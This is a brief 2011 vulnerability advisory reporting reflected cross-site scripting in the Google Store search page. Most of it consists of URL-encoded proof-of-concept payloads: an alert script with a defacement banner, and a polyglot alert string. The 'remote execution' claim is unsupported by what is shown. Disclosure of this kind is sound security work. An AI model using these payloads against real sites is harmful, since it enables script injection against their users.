Google Store Cross Site Scripting

2011-05-10T00:00:00
ID PACKETSTORM:101266
Type packetstorm
Reporter Ivan Sanchez
Modified 2011-05-10T00:00:00

Description

                                        
                                            `   
Author(s): Ivan Sanchez   
  
Product: Google Store  
  
Web: http://www.googlestore.com/googlesearch.aspx?category= [1]  
  
Evil Function:   
  
-------------------  
googlesearch.aspx?  
  
Exploiting:  
--------------  
  
http://www.googlestore.com/googlesearch.aspx?category= XSS & Remote  
Execution Code   
  
Real case only to check the bug :  
  
  
http://www.googlestore.com/googlesearch.aspx?category=http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10  
  
http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25">  
  
[2]  
  
Many Thanks  
  
Ing. Ivan Javier Sanchez   
  
Ivan.Sanchez@nullcode.com.ar   
http://www.linkedin.com/in/nullcode   
  
Links:  
------  
[1] http://www.googlestore.com/googlesearch.aspx?category=  
[2]  
http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10  
`